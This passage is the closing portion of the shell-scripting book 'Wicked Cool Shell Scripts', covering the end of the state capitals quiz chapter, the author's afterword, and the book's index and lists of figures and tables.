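Since squash Juneu also yields "jn", comparing squashed guesses against squashed answers would forgive exactly the kind of spelling slip the paragraph describes.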
As with other games, a "hint" function would be useful too. Perhaps it would show the first letter of the correct answer
when requested but keep track of how many hints were used as the play proceeded.
Although this game is written around state capitals, it would be quite trivial to modify the script to work with any sort of
paired data file. For example, you could create an Italian vocabulary quiz with a slightly different file, or a country/
currency match, or even a politician/political party quiz. Again, as we've seen repeatedly in Unix, writing something that
is reasonably general purpose allows it to be reused in useful and occasionally unexpected ways.

Afterword
This marks the end of Wicked Cool Shell Scripts. Thank you for being part of this journey into the wild interior of shell
scripting. I've really had a fun time writing and developing all of the scripts in this book, and it's significantly improved
my Unix and Mac OS X working environment! I can only hope that this book has expanded your horizons similarly, both
showing you the tremendous power and capability of the Unix shell, and offering you many ideas about basic
algorithms and savvy ways to approach seemingly tough programming problems.
Please let me know how you liked the book, which scripts are your favorites, and which, if any, hiccupped on your
particular version of Unix, Linux, or Mac OS X. You should also check in occasionally on the book's website for errata
and new scripts, and you can even browse a library of scripts that were axed for the book but might still be interesting
reading. Go to http://www.intuitive.com/wicked/ and you'll find everything you need to continue your
journey toward becoming a Shell Script Maven.
Best regards,
Dave Taylor
<taylor@intuitive.com>

Index
Note: Italicized page numbers refer to tables and illustrations.

Symbols
$() notation, 49, 57, 151
$#varname notation, 97
$$ notation, 39
$(()) sequence, 29, 30
${#var} notation, 98
${var%${var#?}} method, 12-13
${var%pattern} call, 13
${varname:?"errorMessage"} notation, 134
${varname:start:size} function, 13
${varvalue%${varvalue#?}} notation, 134
% mod function, 39
\\n notation, 174
^V sequence, 35
~account service, 126
<< notation, 30
>/dev/null notation, 52, 308
\033 sequence, 35
2>&1 notation, 233, 308

Index
A
access_log file, 256-60
accounts
admin, 243
badguy, 302
password-protected, 171-72
user accounts
deleting, 129-31
listing all, 241-42
suspending, 127-29
virtual host, 290-95
AccuWeather site, 181
Adams, Cecil, 210
addagenda script, 86, 86-88, 90
adding users, 124-27, 302-7
addmacalias script, 307-9
addmacuser script, 302-7
adduser script, 124-27
addvirtual script, 290-95
admin account, 243
administration, Internet. See web and Internet administration
administration, system. See managing users; system maintenance
agenda script, 86, 89-91
alphanumeric input, validating, 13-15
American National Standards Institute sequences. See ANSI color sequences
ANSI color sequences, 33-35
Apache access_log file, 256-60
Apache error_log file, 264-68
Apache passwords, 237-44
apm script, 237-44
code, 237-40
hacking, 243-44
how works, 241-43
results of, 243
running, 243
apm-footer.html file, 238, 242
apropos command, 63
arbitrary-precision floating-point calculator, 2931
archivedir script, 161-63
archives
remote, 268-71
removed, 49-53
archiving files, as removed, 47-49
args variable, 262
aspell spelling utility, 235
awk command, 52, 57, 94, 146, 285
awk script, 119, 168, 184

B
backing up directories, 161-63
backup script, 158-60
backups, managing, 158-60
badguy account, 302
basename, 48
bash shell, 3, 310
BBC news, tracking with lynx, 172-75
bbcnews script, 172-75
bc program, 29, 30, 86
bestcompress script, 107-9
/bin/sh login shell, 304
books, checking overdue at library, 182-86
Bourne Shell scripts, 3
broken external links, 232-35

C
\c escape sequence, 10
calc script, 73-75
calculating
currency values, 188-92
loan payments, 84-86
calculators
floating-point arbitrary-precision, 29-31
interactive, 73-75
case statement, 241, 313
cat command, 46, 212, 270
Census Bureau, 180
CGI environment, 204-5
CGI scripts, 201, 203
cgi-bin directory, 203, 243
cgrep script, 102-4
changetrack script, 196, 196-200
chattr command, 55
checkexternal script, 232-35
checkfor function, 267
checkForCmdInPath method, 13
checking spelling, 75-76
checklibrary script, 182-86
checklinks script, 178, 230-32
checkspelling script, 75-76
chown command, 293
Christiansen, Tom, 3
code element, 183
color sequences, ANSI. See ANSI color sequences
commands, user. See user commands
compress program, 104, 106
compressed files
code, 104-7
ensuring maximally compressed files, 107-9
connecttime script, 166-68
contact forms, processing, 211-14
contactus.html web page, 213
content mirroring, 244
convertatemp script, 82-84
counter script, 221-25
cron jobs, 152-54
code, 152-53
crontab entries, validating, 147-52
code, 148-50
hacking script, 152
results of script, 151
running script, 151
crontab file, 147, 151, 285
.cshrc file, 123
curl utility, 171
currency values, calculating, 188-92
cut command, 20, 86, 262, 311

D
date command, 66, 69, 90, 139, 220
date formats, normalizing, 15-18
date format string, 141
date, system, 139-41
debugging shell scripts, 38-41
define script, 178-80
defining words, 178-80
.deleted-files directory, 47, 49
deleteuser script, 124, 129-31
deleting user accounts, 129-31
/dev/null directory, 233-34
/dev/null shells, 302
df command, 117
df output, improving readability of, 118-20
dictionary, adding, 80-82
diff command, 311
DIR script, 61-63
directories
See also names of specific directories
backing up, 161-63
code, 56-57, 161-62
displaying contents of, 56-58
synchronizing with ftp, 244-47
Directory block, 293
disk quota exceeded error message, 116
diskhogs script, 115-17
disks
analyzing usage, 113-14
available space, 117-18
reporting hogs, 115-17
diskspace script, 117-18
ditto command, 305
docron, 154
docron script, 152-54
downloading files, 169-72
du command, 113
du command, 113

E
echo function, 10, 27-29
echon script, 28-29, 36-37
email
adding alias, 307-9
turning web pages into, 210-11
enabled script, 141-44
enabled services, 141-44
env command, 204
environment variables, 10
error_log file, 264-68
escape sequences, 219
/etc/crontab file, 153
/etc/passwd file, 113, 125, 126
/etc/skel directory, 126
eval function, 106, 140
events, keeping track of, 86-91
code, 86-89
hacking script, 91
results of script, 90-91
exceeds disk quota message, 114
exchangerate script, 191-92
Extensible Markup Language (XML), 166
external links, broken, 232-35
extracting URLs from web pages, 175-78

F
File Transfer Protocol (FTP). See FTP (File Transfer Protocol)
filelock script, 31-33
filenames, 58-61
files
archiving as removed, 47-49
compressed, 104-7
displaying with additional information, 95-96
displaying with line numbers, 94-95
downloading via FTP, 169-72
locating by filename, 58-61
locked, 31-33
logging removals, 54-55
removed archives, 49-53
rotating log, 154-58
synchronizing with sftp program, 249-53
find function, 53, 114, 123, 157
findman script, 63-66
findsuid script, 138-39
fixguest script, 135-36
floating-point calculator, 29-31
floating-point input, 22-24
fmt command, 45, 96, 97, 116
footer.html file, 215, 221
formatdir script, 56-58
forms, contact, 211-14
fquota script, 113-14, 115-16
Free Software Foundation, 3
FTP (File Transfer Protocol)
downloading files via, 169-72
making sftp look like, 100-101
synchronizing directories with, 244-47
tracking usage, 276-80
ftpget script, 169-72
ftpsyncdown script, 192, 247-49
ftpsyncup script, 244-48

G
games, 315-27
hangman, 320-24
state capitals quiz, 324-27
unscramble word, 316-19
getdope script, 210-11
getexchrate script, 188-92, 194
getlinks script, 175-78
getstats script, 280-81, 284-85
getstock script, 193-95
gmk function, 57
GNU-style flags, 98-100
grep program, 65, 102-4, 118, 234, 267
guest books, 217-21
guestbook script, 217-21
guestbook.txt file, 219-20
guests, cleaning up after, 135-36

H
hacks, webmaster. See webmaster hacks
hangman game, 320-24
header.html file, 215, 221
here document capability, 30
hilow script, 38-41
hint function, 327
Holbrook, Bill, 208-9
/home directory, 113
.htaccess file, 237-38, 241, 243
.htpasswd file, 241, 243
htpasswd program, 237, 241, 243
httpd.conf file, 66, 293-94

I
id applications, 138-39
IEEE (Institute of Electrical and Electronics Engineers), 10
if statements, 22
IFS (internal field separator), 134, 242
ImageMagick tool, 216
IMDb (Internet Movie Database), 186-88
in_path() function, 134
inetd service, 141-42
inpath script, 10-13
input
alphanumeric, 13-15
floating-point, 22-24
integer, 20-22
Institute of Electrical and Electronics Engineers (IEEE), 10
integer input, 20-22
code, 20-21
hacking script, 22
results of script, 22
running script, 21
interactive calculator, 73-75
code, 74
results of script, 75
running script, 75
internal field separator (IFS), 134, 242
internal links, 230-32
Internet Movie Database (IMDb), 186-88
Internet server administration, 255-95
See also web and Internet administration; web and Internet users
adding new virtual host accounts, 290-95
avoiding disaster with remote archive, 268-71
exploring Apache access_log, 256-60
exploring Apache error_log, 264-68
mirroring websites, 272-75
monitoring network status, 280-86
code, 281-83
how it works, 284-85
results of script, 286
running script, 285-86
renicing tasks by process name, 286-90
tracking FTP usage, 275-80
understanding search engine traffic, 260-64
ispell command, 76, 77, 81
itunelist script, 310-12
iTunes libraries, 310-12

K
Kevin & Kell comic strip, 208-9
kill processes, 144-47
killall command, 144
killall script, 144-47

L
large numbers, presenting, 18-20
lastcmd variable, 176
latitude/longitude information, 180
left-rooting, 146
libraries
checking overdue books at, 182-86
iTunes, 310-12
shell script, 36-38
.library.account.info database library, 184
library.sh script, 36
library-test script, 36-38
line numbers, 94-95
lines
formatting long lines, 45-47
wrapping long, 97-98
links
external, 232-35
internal, 230-32
listmacusers script, 300-302
loan payments, calculating, 84-86
loancalc script, 84-86
locate script, 58-61, 120
locate system, 58-59
locate.db file, 60
.locatedb file, 120
Location string, 181
locked files, 33
lockf command, 222
lockfile command, 31
lockfile program, 131, 222
log files, rotating, 154-58, 155-57
logger command, 55
logging web events, 205-8
logrm script, 54-55
log-yahoo-search.cgi script, 206-8
long lines
formatting, 45-47
wrapping, 97
ls command, 52, 56, 61
lynx command, 172-75, 230, 233, 236

M
Mac OS X scripts, 297-314
adding email alias, 307-9
adding users, 302-7
fixing open command, 312
list NetInfo users, 300-302
producing summary listings of iTunes libraries, 310-12
set Terminal title dynamically, 309-10
maintenance, system. See system maintenance
man command, 63
man page database, 63-66
managing users, 111-36
adding users to system, 124-27
analyzing disk usage, 113-14
cleaning up after guests leave, 135-36
deleting user accounts, 129-31
figuring out available disk space, 117-18
implementing secure locate, 120-24
improving readability of df output, 118-20
reporting disk hogs, 115-17
suspending user accounts, 127-29
validating user environment, 132-35
manpagepat command, 65
method=get form, 182, 194
mklocatedb script, 58-61
mkslocate script, 120-24
mkslocatedb script, 124
more program, 96
moviedata script, 186-88
movies, 186-88
Music Folder field value, 311
mv command, 158
mysftp script, 100-101

N
name, process, 286-90
ncftp command, 247
NetInfo database, 124, 298, 300-302
netperf script, 281-86, 284-85
code, 281-83
hacking, 286
how it works, 284-85
results of, 286
running, 285-86
netstat program, 280-84
netstat.log file, 284, 286
network status, monitoring, 280-86
code, 281-83
hacking script, 286
running script, 285-86
network time, 141
Network Time Protocol (NTP), 141
newdf script, 118-20
newquota script, 100
newrm script, 47-49
nicenumber script, 18-20
nireport utility, 300-301, 304
niutil command, 302-4, 305
normalize function, 89
normdate script, 15-18, 25
nroff command, 45, 46
NTP (Network Time Protocol), 141
numberlines script, 94-95
numbers
large, 18-20
line, 94-95

O
okaywords file, 82
online, calculating time spent, 166-68
open command, 298, 312-14
Open Directory Project, 180
open2 script, 312-14, 313-14
Oxford English Dictionary, 180

P
PAGER variable, 10, 132
page-with-counter.html, 225
palindrome checker, 316
partial variable, 322
password-protected account, 171-72
passwords, Apache, 237-44
PATH variable, 10-13, 132, 134
pax command, 160
payments, loan, 84-86
periodic script, 154
Perl module, 65-66
permission denied error messages, 123
photo album, creating web-based, 214-17
Point-to-Point Protocol (PPP) daemon, 167
portfolio script, 193-95
POSIX compliant, 4, 10
PPP (Point-to-Point Protocol) daemon, 167
privacy.shtml file, 231
/proc directory, 114
process name, tasks by, 286-90
processing contact forms, 211-14
ps command, 144

Q
QUERY_STRING variable, 206, 241
quiz, state capitals, 324-27
quota script, 98-100

R
ragged.txt, 106
random text, displayed, 226-27
randomquote script, 226-27
read input command, 98
read statement, 171-72
Really Simple Syndication (RSS), 200
realquota variable, 99
realrm process, 48
referrer code, 256
region/locationname columns, 69
reject.dat file, 230, 232
remember script, 72, 72-73
reminder utility, 72-73
remindme script, 72, 73
remote archives, 268-71
remotebackup script, 268-71
remotebackup-filelist, 268-71
remotehost script, 100, 101
remove.log file, 55
renicename script, 286-90
resource forks, 305
result code, 256
right-rooting, 146
rm command, 49, 54
root user, 138
rot13 mechanism, 315-16
rotatelogs script, 154-58
rotating log files, 154-58
RSS (Really Simple Syndication), 200
run-script script, 154

S
screencapture command, 299
scriptbc script, 29-31
search engine traffic, 260-64
searchinfo script, 260-64
secure locate, implementing, 120-24, 174, 219, 258, 284
sed script, 79, 103
sed statement, 52
sed-based transform, 14
semaphore, 31
sendmail, 198, 202, 307-8
server administration. See Internet server administration
server-side include (SSI) directive, 224
services, displaying enabled, 141-44
set-date script, 139-41
setgid script, 120, 138
setting system date, 139-41
setuid command, 138, 139
setuid permission, 55
setuid script, 120
sftp program
to look like ftp program, 100-101
synchronizing files, 249-53
sftpsync script, 249-53
shell scripts
debugging, 38-41
library of, building, 36-38
types of, 2-4
what they are, 2
showcgienv script, 204-5
showfile command, 96
showfile script, 95-96
showpic script, 217
.shp suffix, 79
shpell script, 77-80
.shtml web page, 224, 227
SIGHUP signal, 128
SIGKILL signal, 128
Simple Network Management Protocol (SNMP), 124
slocate script, 120, 122, 123
.slocatedb files, 124
smallest command, 109
Snapz Pro X software, 299
SNMP (Simple Network Management Protocol), 124
Solaris system, 34
sourcing capability, 36
sourcing files, 191
spelldict script, 80-82
spelling, checking, 75-82
adding local dictionary, 80-82
of individual words, 75-76
Shpell, 77-80
on web pages, 235-37
ssh package, 249
SSI (server-side include) directive, 224
ssync script, 251-53
state capitals quiz, 324-27
states script, 324-27
stderr command, 234
stdin command, 81
stdout command, 233
stock portfolio, tracking, 193-95
Straight Dope, The, 210
streamfile script, 225
su -fm user, 122
substitution cipher, 315
sudo command, 114, 116, 141, 305
sudo password, 141
suspending user accounts, 127-29
suspenduser script, 124, 127-29
syslogd.conf file, 55
system administration. See managing users; system maintenance
system date, setting, 139-41
system() function, 119
system maintenance, 137-63
backing up directories, 161-63
displaying enabled services, 141-44
ensuring system cron jobs run, 152-54
killing processes by name, 144-47
managing backups, 158-60
rotating log files, 154-58
setting system date, 139-41
tracking set user ID applications, 138-39
validating user crontab entries. See crontab entries, validating

T
tar archive, 274
tar invocation, 270, 271
target directory, 275
tasks, renicing, 286-90
TCP protocol, 280
tcsh shell, 310
temperatures, converting, 82-84
template directory, 135-36
Terminal application, 309
terminal title, setting dynamically, 309-10
test command, 2
testing scripts, 12
text, random, 226
text-based web page counter, 221-25
TIFF files, 300
time
different time zones, 66-69
spent online, 166-68
timed(8) script, 141
timein script, 66-69
.timestamp file, 246
timezonename columns, 69
titleterm script, 309-10
toolong script, 97-98
tracking
BBC news with lynx, 172-75
changes on web pages, 196-200
stock portfolio, 193-95
weather, 180-82
trap command, 79, 107
traverse function, 230-31
traverse2.dat file, 231
traverse.dat file, 231
traverse.errors file, 231-32
trimmailbox script, 271
trimmailbox script, 271

U
umask value, 48
Unimplemented command, 170
uniq command, 174
UNIX, tweaking, 93-110
compressed files
ensuring maximally, 107-9
working with, 104-7
displaying files with, 94-96
emulating GNU-style flags with quota, 98-100
fixing grep, 102-4
making sftp look like ftp, 100-101
wrapping long lines, 97-98
unpacker script, 272-75
unrm script, 49-53
Unscramble word game, 316-19
updatecounter script, 223-25
URLs, extracting from web pages, 175-78
user accounts
deleting, 129-31
listing all, 241-42
suspending, 127-29
user commands, 43-70
archiving files as removed, 47-49
displaying contents of directories, 56-58
displaying time in different time zones, 66-69
emulating DIR environment, 61-63
formatting long lines, 45-47
locating files by filename, 58-61
logging file removals, 54-55
man page database, 63-66
working with removed file archive, 49-53
user environment, 132-35
users
See also system administration
adding to Mac OS X system, 302-7
managing, 111-36
adding users to system, 124-27
analyzing disk usage, 113-14
cleaning up after guests leave, 135-36
deleting user accounts, 129-31
figuring out available disk space, 117-18
implementing secure locate, 120-24
improving readability of df output, 118-20
reporting disk hogs, 115-17
suspending user accounts, 127-29
validating user environment, 132-35
NetInfo, 300-302
tracking ID applications, 138-39
validating crontab entries, 147-52
code, 148-50
hacking script, 152
how it works, 151
results of script, 151
validating environment, 132-35
web and Internet users, 165-200
calculating currency values, 188-92
calculating time spent online, 166-68
checking overdue books at library, 182-86
defining words online, 178-80
downloading files via ftp, 169-72
extracting URLs from web pages, 175-78
movie info from IMDb, 186-88
tracking BBC news with lynx, 172-75
tracking changes on web pages, 196-200
tracking stock portfolio, 193-95
tracking weather, 180-82
/users directory, 113
utilities, creating, 71-92
adding local dictionary to spell, 80-82
calculating loan payments, 84-86
checking spelling of individual words, 75-76
converting temperatures, 82-84
interactive calculator, 73-75
keeping track of events, 86-91
reminder utility, 72-73
Shpell interactive spell-checking facility, 77-80
uuencode program, 270

V
validalnum script, 13-15
validating
See also crontab entries, validating
alphanumeric input, 13-15
date formats, 25-27
floating-point, 22-24
integer input, 20-22
user environment, 132-35
validator script, 132-35
valid-date script, 25-27
validfloat script, 22-24
validint script, 20-22
/var/log directory, 157
/var/log/messages log, 272
verifycron script, 147-52
view source capability, 183
virtual host accounts, 290-95
code, 290-93
hacking script, 295
VirtualHost block, 293

W
wait call, 109
Warez files, 280
watch-and-nice script, 289-90
wc command, 52, 57, 60, 98, 177
weather script, 180-82
weather, tracking, 180-82
web and Internet administration, 229-54
See also Internet server administration
identifying broken internal links, 230-32
managing Apache passwords, 237-44
reporting broken external links, 232-35
synchronizing directories with ftp, 244-47
synchronizing files with sftp, 249-53
synchronizing to remote directory via ftp, 247-49
verifying spelling on web pages, 235-37
web and Internet users, 165-200
calculating currency values, 188-92
calculating time spent online, 166-68
checking overdue books at library, 182-86
defining words online, 178-80
downloading files via ftp, 169-72
extracting URLs from web pages, 175-78
movie info from IMDb, 186-88
tracking BBC news with lynx, 172-75
tracking changes on web pages, 196-200
tracking stock portfolio, 193-95
tracking weather, 180-82
web events, logging, 205-8
web pages
building, 208-11
extracting URLs from, 175-78
text-based counter, 221-25
tracking changes on, 196-200
turning into email messages, 210
verifying spelling, 235-37
webaccess script, 257-60
web-based photo album, creating, 216
weberrors script, 264-68
webhome directory, 274
webmaster hacks, 201-28
building guest book, 217-21
building web pages, 208-11
CGI environment, 204-5
creating text-based web page counter, 221-25
creating web-based photo album, 214-17
displaying random text, 226
logging web events, 205-8
processing contact forms, 211-14
running scripts in chapter, 203
/web/mirror directory, 275
websites, mirroring, 272-75
webspell script, 235-37
whatis command, 63
which command, 224
whoami script, 59
word game, 316-19
WordNet lexical database, 178
wrappers, 44, 54
wrapping long lines, 97-98

X
xargs command, 57
xferlog format, 276-80
xinetd service, 144
XML (Extensible Markup Language), 166

Z
zcat script, 104-7
zones, time, 66-69

List of Figures
Chapter 7: Web and Internet Users
Figure 7-1: A graphically complex website in lynx: http://www.intuitive.com/
Figure 7-2: The site has changed, so the page is sent via email from changetrack

Chapter 8: Webmaster Hacks


Figure 8-1: The CGI runtime environment, from a shell script
Figure 8-2: Yahoo! search results appear, but the search was logged!
Figure 8-3: The Kevin & Kell web page, built on the fly
Figure 8-4: A typical user feedback form, already filled in
Figure 8-5: An instant online photo album created with 44 lines of shell script!
Figure 8-6: A guest book system, all in one neat shell script
Figure 8-7: Server-side includes let us invoke shell scripts from within HTML files

Chapter 9: Web and Internet Administration


Figure 9-1: A shell-script-based Apache password management system

Chapter 11: Mac OS X Scripts


Figure 11-1: Login window with Gareth's account included

List of Tables
Chapter 10: Internet Server Administration
Table 10-1: Field values in the access_log file
Table 10-2: Field values in the xferlog file
